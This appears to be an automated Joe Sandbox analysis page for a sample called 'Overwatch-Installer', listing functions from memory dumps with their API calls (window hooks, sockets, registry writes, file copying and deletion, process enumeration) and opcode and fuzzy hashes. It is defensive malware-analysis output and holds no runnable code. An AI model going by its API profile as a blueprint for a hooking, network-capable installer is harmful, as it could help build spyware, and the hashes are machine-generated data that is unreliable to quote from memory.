Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 3d2302ddb8bcc5f4e4ef05b0c834f42eac5924d93e1010d24d0c7ffd369ba8fe
Instruction ID: 3eb050e242d20f18e2ee8878ec0325d7405e49dbdc7ef7a276820d3c4b0c0afd
Opcode Fuzzy Hash: 3d2302ddb8bcc5f4e4ef05b0c834f42eac5924d93e1010d24d0c7ffd369ba8fe
Instruction Fuzzy Hash: 1C21C371409384AFD722CF54CC84FA6FFB8EF45314F0884AAE9859B552C374A908C7B5

Function 05BF50CA Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF513C

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 043a8df4432190b011b0a3ec51f47461e614a07b3602e5d1bdcff7587c9ab4e7
Instruction ID: 4e3b42dc74719f5c63c664a4333362ca3e7cd6853b326c7e8b5d5e046cc14920
Opcode Fuzzy Hash: 043a8df4432190b011b0a3ec51f47461e614a07b3602e5d1bdcff7587c9ab4e7
Instruction Fuzzy Hash: A2219A72504204AFEB21CF55DC84FAABBECEF04610F1484AAEA458B691E370F508CBB1

Function 05BF09F6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05BF0A6A

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: dd7579380952a430957b7f5309423a8b8d3308b3af66e2be669e0d8901a9b7dc
Instruction ID: d95517068821ca938f9be30ca8931edec57131b42b93c2a5b0b5afffe9961f8c
Opcode Fuzzy Hash: dd7579380952a430957b7f5309423a8b8d3308b3af66e2be669e0d8901a9b7dc
Instruction Fuzzy Hash: D221DE71404244AFE721DF55CD84FAAFBE8EF08324F048499EA858BA51D375B40DCBB6

Function 05BF0344 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 05BF03CE

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: beefc72e5d0c2ef95e5ec52d262f9fbc28c77ef9ae6547c15aea38bf94a9c3e6
Instruction ID: 136aa127263448731f5efd3e3c47e5531033b830015aac24186f2870a3ec2c6f
Opcode Fuzzy Hash: beefc72e5d0c2ef95e5ec52d262f9fbc28c77ef9ae6547c15aea38bf94a9c3e6
Instruction Fuzzy Hash: F02181B15093806FC312CB65CC55B66BFB4EF87620F0981DBD8848B693D225A919CBA6

Function 05BF26B2 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF2716

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 208f2f9a319b62556485c97f6dcaa27aed14bcba6ee98b6fdd1a7a643b9e8ebd
Instruction ID: c8f66b31cac754dd9767d681a2301a90de05e49331a79aaae6980fe7d3277875
Opcode Fuzzy Hash: 208f2f9a319b62556485c97f6dcaa27aed14bcba6ee98b6fdd1a7a643b9e8ebd
Instruction Fuzzy Hash: 5311AC75604204AFEB20CF55CD85FAAFBE8EF04624F0484AAEE45CB651D770E84D8BB5

Function 05BF043E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05BF04AA

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 1887ec1914ce5e4a0d8d7a0b9f813df05ccc000463ae22701fd945e18402a594
Instruction ID: d0d7788b462f44eda6f79df3be3e77ab2a4120f3f6ac3744dd3738b30126f5dc
Opcode Fuzzy Hash: 1887ec1914ce5e4a0d8d7a0b9f813df05ccc000463ae22701fd945e18402a594
Instruction Fuzzy Hash: A321F271404244AFE721DF55DD44F66FBE8EF04324F0488ADEA468B652C375A409CB72

Function 0112A73E Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000E24,?,?), ref: 0112A7BD

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 7e46cd6abf1a15d4e63c9a78ceca4bbac1dfe2c20e31a5cfa7f4535c79d84be3
Instruction ID: 8454dd7a7a36c2af526f979d20d6a8e2d51ed1a91a5380551f196d3aab28a8fd
Opcode Fuzzy Hash: 7e46cd6abf1a15d4e63c9a78ceca4bbac1dfe2c20e31a5cfa7f4535c79d84be3
Instruction Fuzzy Hash: 5811E6715493806FD3118B15DC41F72FFB8EF86620F19819AEC888BA82D235B919C7B6

Function 05BF3FD8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF4046

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 8a37bf298018df9e8a09993959f6e054221c0bcb40e00c50a8d463c8afa03bca
Instruction ID: 99720b3cc4ccbc60ae4f0f34fc4d9da8b31e24305bca5661fc72184fed62f9fa
Opcode Fuzzy Hash: 8a37bf298018df9e8a09993959f6e054221c0bcb40e00c50a8d463c8afa03bca
Instruction Fuzzy Hash: AC2160B25093805FDB11CF65DC85B63BFE8EF06210F0984EAED85CB652D225E948CB61

Function 05BF15C2 Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNEL32(?,00000E24), ref: 05BF1625

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 81d861fada1648c6971791510d7eb60c114c0bab76665234cea9b4339c6b263c
Instruction ID: 4c2cacec3f1c7e312ccd03528969372faec4bbd9fa2b12cb5fa785124c3bf665
Opcode Fuzzy Hash: 81d861fada1648c6971791510d7eb60c114c0bab76665234cea9b4339c6b263c
Instruction Fuzzy Hash: B511B171504244EEEB20DF54DC44FBAFBACEF04714F0888AAEE449B641D374A80D8BB5

Function 05BF63CD Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05BF6449

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 5f33c3c614e4eae0396e096c3ca55e095241d3d21883b2d64a8b8a3e0245ea55
Instruction ID: e17f8c1f6463a19c909c986cef726ccf1a02aa26531f70fc28091abdb847f61b
Opcode Fuzzy Hash: 5f33c3c614e4eae0396e096c3ca55e095241d3d21883b2d64a8b8a3e0245ea55
Instruction Fuzzy Hash: 79218EB15093806FDB228E15DC45B62BFF8FF06610F0880DAED858B292D265A908CB71

Function 05BF17C6 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF1830

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 78d35bf6ffaa7951dbecea1d2b18457a75bc59cf5572cff15ccb947f5f8ced88
Instruction ID: 50966275638c26d987d32b2339433cb51b1f11612753bbcc1baf1780b5c7b85c
Opcode Fuzzy Hash: 78d35bf6ffaa7951dbecea1d2b18457a75bc59cf5572cff15ccb947f5f8ced88
Instruction Fuzzy Hash: 8D11AF71404244EFEB21CF55DD44FAAFBACEF04714F0488AAEA458BA41D734A54CCBB5

Function 05BF417E Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF41F0

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 50a0c22e5d7458eee1b508607f5b261fa77c02d41b11f3e10796a9e7e26c1230
Instruction ID: fe65a6b83e9abc5b474a706143ee8eace431a96e9373720e0b48d44dcd27134a
Opcode Fuzzy Hash: 50a0c22e5d7458eee1b508607f5b261fa77c02d41b11f3e10796a9e7e26c1230
Instruction Fuzzy Hash: BF11ACB6500200AFEB21CE51DC40FA7BBA8EF04624F0484AAEA458BA41D360E90C8BB5

Function 05BF075A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF07CC

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 211b0234fe7af9b05b955929f8b678e9ad2d85150ec268c3e880d810bff7bac6
Instruction ID: 29a069fe37184cdd507b11fb44ec84efb8d37929b71c821bc1c6ce7a18956630
Opcode Fuzzy Hash: 211b0234fe7af9b05b955929f8b678e9ad2d85150ec268c3e880d810bff7bac6
Instruction Fuzzy Hash: B411A271504604AFE721DF55CC88FA7F7E8EF04610F04849AEA468B662D360E44DCBB5

Function 05BF6A3D Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05BF6AB5

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1506d31e1c9d2221f5cbebf58c0d820cc70b4562a61bd5c575716fa5fb20ca81
Instruction ID: 22ce360413a0979044f41e92ebef7d6e40991c4d5a3b4c006b6be8832f166837
Opcode Fuzzy Hash: 1506d31e1c9d2221f5cbebf58c0d820cc70b4562a61bd5c575716fa5fb20ca81
Instruction Fuzzy Hash: A6219A765097C09FDB128F25CC44B62BFB4EF17224F0D84DEE9858B663D265A848CB62

Function 05BF4238 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF42A0

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: cc0718a569583a3ffc37af16690cee78f4fe659ee7c7f36491432c57225428ca
Instruction ID: 14693c4c789d7553c91845388f5f0b6364729b255da83d843df88c3c182093cc
Opcode Fuzzy Hash: cc0718a569583a3ffc37af16690cee78f4fe659ee7c7f36491432c57225428ca
Instruction Fuzzy Hash: 3E218E715093809FDB128B25DC55B66BFA8EF42214F0884EAED858F652D265E408CB61

Function 05BF0324 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 05BF03CE

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 6b8b22a248dec009c6991694877778781a42c977127ac9a427a5869a9fd865e9
Instruction ID: 989544c727e9266ceabc5b0372613a5e6c000484c7962d5a5e81bab001b44de9
Opcode Fuzzy Hash: 6b8b22a248dec009c6991694877778781a42c977127ac9a427a5869a9fd865e9
Instruction Fuzzy Hash: C811B6715083806FC312CB25CC55B62FFB4EF4B624F09819EE9448B653D625B919C7B2

Function 05BF1C98 Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF1D10

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 5657471909df04c53a5428dea3703177d7286b55ddb771112e4a71d9c20892f6
Instruction ID: 4d23c3859c22faa876010bf6087dc488ff9f5117727905bccc92f5b468e512e5
Opcode Fuzzy Hash: 5657471909df04c53a5428dea3703177d7286b55ddb771112e4a71d9c20892f6
Instruction Fuzzy Hash: 33110371408380AFD722CB01CC45FA6FFB8EF45220F0884DAE9448B292C364A848CBB5

Function 05BF106A Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF10C9

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: d492cb5a9acf156a85a21489da0fe51d28eeea53b4e837ff2dbe83a62730cb4c
Instruction ID: dec34ba47a4f9f1679b0ec2b8d5bee25d02a702aad51e67f4a7360c233cba38d
Opcode Fuzzy Hash: d492cb5a9acf156a85a21489da0fe51d28eeea53b4e837ff2dbe83a62730cb4c
Instruction Fuzzy Hash: 1D11BE72504244AFEB21CF65DC45FAAFBA8EF04324F0488AAEA458B651D370A449CBA5

Function 05BF25CA Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF2626

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 45fb6dc6239c758370cea1d71f9b989d115e227e7098b4846f2d9712583fbbf5
Instruction ID: 1d6665fddd9400de0cb8bf359bef941ec8fdd9a5a00c5babf194940d632a9952
Opcode Fuzzy Hash: 45fb6dc6239c758370cea1d71f9b989d115e227e7098b4846f2d9712583fbbf5
Instruction Fuzzy Hash: F811E275500204AFEB21CF54DD84FAAFBA8EF04724F0484AAEA458B651D770A40C8BB5

Function 05BF3F1C Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF3F83

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: a82609c9e2aeabd633c8c907269987d092a83538ab96b7e2d8394454becddff7
Instruction ID: 064273cda0538ee90984acf25875f1e979e95c952626e10caf0b3152d690e685
Opcode Fuzzy Hash: a82609c9e2aeabd633c8c907269987d092a83538ab96b7e2d8394454becddff7
Instruction Fuzzy Hash: 0C117F71509380AFD711CF69DC84B56BFE8EF06220F0884EEE945CB252D224E848CB61

Function 05BF050D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05BF0580

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 126a43d9e2853ac0e1be318ade3abb836885e4936f80600d52a4fb0b8d146a18
Instruction ID: 42b5dd5c0ba90e8a753060ab45a161e399a0b28f1aecd4ff59a0d959e09fa0bb
Opcode Fuzzy Hash: 126a43d9e2853ac0e1be318ade3abb836885e4936f80600d52a4fb0b8d146a18
Instruction Fuzzy Hash: D3215B715093C0AFDB128F65DC94B62BFB4EF07320F0988DAE9858F163C265A458CB62

Function 05BF1412 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF1476

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 168780888bdec1e0bb6e8a26ea9e505d9ed35c77cbe4507bfeb47fdfab3ed914
Instruction ID: 52a0ea563e86fa2c8f46549ae58b6c4d6c75871478158874d9b1a638946ede8a
Opcode Fuzzy Hash: 168780888bdec1e0bb6e8a26ea9e505d9ed35c77cbe4507bfeb47fdfab3ed914
Instruction Fuzzy Hash: 821190B2504244AFE721CF55CC84FAAF7ACEF44324F0488AAEA45CB641D774A54CCBB5

Function 05BF3A46 Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF3AA2

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 808770a65fb22ab240a9d8e12687ebf68c64d45090609a56d3b8e13a405ec61c
Instruction ID: 154472ef416fffd9617aa25d36cac0fdb92252a429aa871774eace6628ef7c53
Opcode Fuzzy Hash: 808770a65fb22ab240a9d8e12687ebf68c64d45090609a56d3b8e13a405ec61c
Instruction Fuzzy Hash: CC11BE71500244AFEB20CF56DC44FAABBE8EF04324F0488AAEE458A641D375A84C8BB5

Function 052FBAA9 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052FBACC

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 036449d2ad31b7624cfcdabb03b0584a73a3d78206ac685716316083ec29b5a7
Instruction ID: 1cec7c2590bb98c0c518f28bda590f29784cc5e9ed5c5481331d65d31a8d4829
Opcode Fuzzy Hash: 036449d2ad31b7624cfcdabb03b0584a73a3d78206ac685716316083ec29b5a7
Instruction Fuzzy Hash: 3F210A7091162ADFDB25DF20C988BAAF7B2AF48305F1184E5D609AB201DB75AEC5CF41

Function 0112A2AE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0112A30C

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c2a6e0bae99a031c234fa32cee8fdf620e3263aa931fac360f078f2a39b60138
Instruction ID: ecaa7248e01934564933b51b6dbfaa07007cbbb4a3570555893cc7ea14a59c00
Opcode Fuzzy Hash: c2a6e0bae99a031c234fa32cee8fdf620e3263aa931fac360f078f2a39b60138
Instruction Fuzzy Hash: 1F114F7040E3C05FD7138B25DC54662BFB49F07620F0984DBDD848F5A3D2655818CB72

Function 05BF2BCA Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05BF2C3E

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5e176b9eb3f1e60b523b3e76624298ef567479e17bab16069d34b9ea331f467e
Instruction ID: d43ea8b8b53cd0938aa892434f7974a8c7cce1fd841b82c5ab22f653eb6dd198
Opcode Fuzzy Hash: 5e176b9eb3f1e60b523b3e76624298ef567479e17bab16069d34b9ea331f467e
Instruction Fuzzy Hash: 80218E71449380AFDB228F65DC45B52FFF4EF06320F0988EEED858B562C275A458DB62

Function 05BF46DE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF4734

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 7a3bce5e1ec924b9fd5b39cc6074e34cd6150587b98e08ee26240d1c22a04ee0
Instruction ID: be6508b2bd815b67c45e0b2c5cfd1cb7cfdc225b40a2236e230f984051664c20
Opcode Fuzzy Hash: 7a3bce5e1ec924b9fd5b39cc6074e34cd6150587b98e08ee26240d1c22a04ee0
Instruction Fuzzy Hash: 1211E071504244AFEB10CF65DC85BBBBBA8EF05324F0484AAEE05CBA41D774A94C8BB5

Function 05BF586C Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 05BF58D7

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 134041bfd7d3c02480cce47cf17b39768b8d1bf2a332db9f4ca267da4eeb9b84
Instruction ID: 0294cfe2bbdb67036e25c0f59737bf157a0bc88b7e11623c683f1a5088363e8b
Opcode Fuzzy Hash: 134041bfd7d3c02480cce47cf17b39768b8d1bf2a332db9f4ca267da4eeb9b84
Instruction Fuzzy Hash: 7211D3715093849FD7258F25DC45A62FFB8EF42220F0980DEED858B2A2C265E808CB71

Function 05BF5D94 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF5DF6

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 87c01ff14eb3e16f70f8a73c7044163a88780f41d098995da5abec2574c63755
Instruction ID: 0aae0231498b8e570e806ddb9025e4b8e84c7784c0876773aaac6c1c1a95f41a
Opcode Fuzzy Hash: 87c01ff14eb3e16f70f8a73c7044163a88780f41d098995da5abec2574c63755
Instruction Fuzzy Hash: 211160715093849FD721CF65DC85B96BFE8EF05220F0884AAE9858B152D235E858CB61

Function 05BF0102 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF0161

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0005fb128b6663f9fa3b1d4af328306d87746ab8d10e5bee38f512c1d3a3f021
Instruction ID: a3e69a113d142bec96ccd5fe7c9b89eb8b766f09472a2881475496b14872a7b8
Opcode Fuzzy Hash: 0005fb128b6663f9fa3b1d4af328306d87746ab8d10e5bee38f512c1d3a3f021
Instruction Fuzzy Hash: 0A110471400208AFEB21CF50CC44FAAFBE8EF04314F1484AAEA458B651C330A50C8BB5

Function 05BF40A1 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF4103

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5065d9598a8fd728f27b731422b02ce5c4265f8347ed308a3bda2f6ddc94d5e0
Instruction ID: b47e86aa1e0d371d65cf045faefcc29c5806d35c3c66b4b372ec7837a041d187
Opcode Fuzzy Hash: 5065d9598a8fd728f27b731422b02ce5c4265f8347ed308a3bda2f6ddc94d5e0
